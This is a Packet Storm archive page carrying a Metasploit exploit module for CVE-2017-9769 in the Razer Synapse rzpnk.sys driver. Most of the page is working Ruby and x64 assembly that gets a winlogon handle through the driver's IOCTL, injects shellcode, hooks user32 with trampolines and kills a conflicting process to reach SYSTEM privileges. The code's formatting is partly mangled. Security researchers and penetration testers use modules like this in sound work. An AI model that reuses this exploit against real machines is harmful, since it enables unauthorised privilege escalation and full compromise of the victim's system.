what you don't know can hurt you

Razer Synapse rzpnk.sys ZwOpenProcess

Razer Synapse rzpnk.sys ZwOpenProcess
Posted Jul 22, 2017
Authored by Spencer McIntyre | Site metasploit.com

A vulnerability exists in the latest version of Razer Synapse (v2.20.15.1104 as of the day of disclosure) which can be leveraged locally by a malicious application to elevate its privileges to those of NT_AUTHORITY\SYSTEM.

tags | exploit, web, arbitrary, shellcode
advisories | CVE-2017-9769
MD5 | 05dbcbf512b9be0da1b9ceddb93d860c

Razer Synapse rzpnk.sys ZwOpenProcess

Change Mirror Download
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core/exploit/local/windows_kernel'
require 'rex'
require 'metasm'

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Local::WindowsKernel
include Msf::Post::Windows::Priv

# the max size our hook can be, used before it's generated for the allocation

def initialize(info = {})
'Name' => 'Razer Synapse rzpnk.sys ZwOpenProcess',
'Description' => %q{
A vulnerability exists in the latest version of Razer Synapse
(v2.20.15.1104 as of the day of disclosure) which can be leveraged
locally by a malicious application to elevate its privileges to those of
NT_AUTHORITY\SYSTEM. The vulnerability lies in a specific IOCTL handler
in the rzpnk.sys driver that passes a PID specified by the user to
ZwOpenProcess. This can be issued by an application to open a handle to
an arbitrary process with the necessary privileges to allocate, read and
write memory in the specified process.

This exploit leverages this vulnerability to open a handle to the
winlogon process (which runs as NT_AUTHORITY\SYSTEM) and infect it by
installing a hook to execute attacker controlled shellcode. This hook is
then triggered on demand by calling user32!LockWorkStation(), resulting
in the attacker's payload being executed with the privileges of the
infected winlogon process. In order for the issued IOCTL to work, the
RazerIngameEngine.exe process must not be running. This exploit will
check if it is, and attempt to kill it as necessary.

The vulnerable software can be found here:
https://www.razerzone.com/synapse/. No Razer hardware needs to be
connected in order to leverage this vulnerability.

This exploit is not opsec-safe due to the user being logged out as part
of the exploitation process.
'Author' => 'Spencer McIntyre',
'License' => MSF_LICENSE,
'References' => [
['CVE', '2017-9769'],
['URL', 'https://warroom.securestate.com/cve-2017-9769/']
'Platform' => 'win',
'Targets' =>
# Tested on (64 bits):
# * Windows 7 SP1
# * Windows 10.0.10586
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
'DefaultOptions' =>
'EXITFUNC' => 'thread',
'WfsDelay' => 20
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => 'Mar 22 2017'))

def check
# Validate that the driver has been loaded and that
# the version is the same as the one expected
client.sys.config.getdrivers.each do |d|
if d[:basename].downcase == 'rzpnk.sys'
expected_checksum = 'b4598c05d5440250633e25933fff42b0'
target_checksum = client.fs.file.md5(d[:filename])

if expected_checksum == Rex::Text.to_hex(target_checksum, '')
return Exploit::CheckCode::Appears
return Exploit::CheckCode::Detected


def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')

if check == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')

if session.platform != 'windows'
fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session')
elsif session.arch != ARCH_X64
fail_with(Failure::NoTarget, 'This exploit only supports x64 Windows targets')

pid = session.sys.process['RazerIngameEngine.exe']
if pid
# if this process is running, the IOCTL won't work but the process runs
# with user privileges so we can kill it
print_status("Found RazerIngameEngine.exe pid: #{pid}, killing it...")

pid = session.sys.process['winlogon.exe']
print_status("Found winlogon pid: #{pid}")

handle = get_handle(pid)
fail_with(Failure::NotVulnerable, 'Failed to open the process handle') if handle.nil?
vprint_status('Successfully opened a handle to the winlogon process')

winlogon = session.sys.process.new(pid, handle)
allocation_size = payload.encoded.length + HOOK_STUB_MAX_LENGTH
shellcode_address = winlogon.memory.allocate(allocation_size)
print_good("Allocated #{allocation_size} bytes in winlogon at 0x#{shellcode_address.to_s(16)}")
winlogon.memory.write(shellcode_address, payload.encoded)
hook_stub_address = shellcode_address + payload.encoded.length

result = session.railgun.kernel32.LoadLibraryA('user32')
fail_with(Failure::Unknown, 'Failed to get a handle to user32.dll') if result['return'] == 0
user32_handle = result['return']

# resolve and backup the functions that we'll install trampolines in
user32_trampolines = {} # address => original chunk
user32_functions = ['LockWindowStation']
user32_functions.each do |function|
address = get_address(user32_handle, function)
user32_trampolines[function] = {
address: address,
original: winlogon.memory.read(address, 24)

# generate and install the hook asm
hook_stub = get_hook(shellcode_address, user32_trampolines)
fail_with(Failure::Unknown, 'Failed to generate the hook stub') if hook_stub.nil?
# if this happens, there was a programming error
fail_with(Failure::Unknown, 'The hook stub is too large, please update HOOK_STUB_MAX_LENGTH') if hook_stub.length > HOOK_STUB_MAX_LENGTH

winlogon.memory.write(hook_stub_address, hook_stub)
vprint_status("Wrote the #{hook_stub.length} byte hook stub in winlogon at 0x#{hook_stub_address.to_s(16)}")

# install the asm trampolines to jump to the hook
user32_trampolines.each do |function, trampoline_info|
address = trampoline_info[:address]
trampoline = Metasm::Shellcode.assemble(Metasm::X86_64.new, %{
mov rax, 0x#{address.to_s(16)}
push rax
mov rax, 0x#{hook_stub_address.to_s(16)}
jmp rax
winlogon.memory.write(address, trampoline)
vprint_status("Installed user32!#{function} trampoline at 0x#{address.to_s(16)}")


def get_address(dll_handle, function_name)
result = session.railgun.kernel32.GetProcAddress(dll_handle, function_name)
fail_with(Failure::Unknown, 'Failed to get function address') if result['return'] == 0

# this is where the actual vulnerability is leveraged
def get_handle(pid)
handle = open_device("\\\\.\\47CD78C9-64C3-47C2-B80F-677B887CF095", 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
return nil unless handle
vprint_status('Successfully opened a handle to the driver')

buffer = [pid, 0].pack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')

session.railgun.add_function('ntdll', 'NtDeviceIoControlFile', 'DWORD',[
['DWORD', 'FileHandle', 'in' ],
['DWORD', 'Event', 'in' ],
['LPVOID', 'ApcRoutine', 'in' ],
['LPVOID', 'ApcContext', 'in' ],
['PDWORD', 'IoStatusBlock', 'out'],
['DWORD', 'IoControlCode', 'in' ],
['PBLOB', 'InputBuffer', 'in' ],
['DWORD', 'InputBufferLength', 'in' ],
['PBLOB', 'OutputBuffer', 'out'],
['DWORD', 'OutputBufferLength', 'in' ],
result = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a050, buffer, buffer.length, buffer.length, buffer.length)
return nil if result['return'] != 0

result['OutputBuffer'].unpack(target.arch.first == ARCH_X64 ? 'QQ' : 'LL')[1]

def get_hook(shellcode_address, restore)
dll_handle = session.railgun.kernel32.GetModuleHandleA('kernel32')['return']
return nil if dll_handle == 0
create_thread_address = get_address(dll_handle, 'CreateThread')

stub = %{
call main
; restore the functions where the trampolines were installed
push rbx

restore.each do |function, trampoline_info|
original = trampoline_info[:original].unpack('Q*')
stub << "mov rax, 0x#{trampoline_info[:address].to_s(16)}"
original.each do |chunk|
stub << %{
mov rbx, 0x#{chunk.to_s(16)}
mov qword ptr ds:[rax], rbx
add rax, 8

stub << %{
pop rbx

; backup registers we're going to mangle
push r9
push r8
push rdx
push rcx

; setup the arguments for the call to CreateThread
xor rax, rax
push rax ; lpThreadId
push rax ; dwCreationFlags
xor r9, r9 ; lpParameter
mov r8, 0x#{shellcode_address.to_s(16)} ; lpStartAddress
xor rdx, rdx ; dwStackSize
xor rcx, rcx ; lpThreadAttributes
mov rax, 0x#{create_thread_address.to_s(16)} ; &CreateThread

call rax
add rsp, 16

; restore arguments that were mangled
pop rcx
pop rdx
pop r8
pop r9
Metasm::Shellcode.assemble(Metasm::X86_64.new, stub).encode_string
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    2 Files
  • 19
    Sep 19th
    2 Files
  • 20
    Sep 20th
    14 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2020 Packet Storm. All rights reserved.

Security Services
Hosting By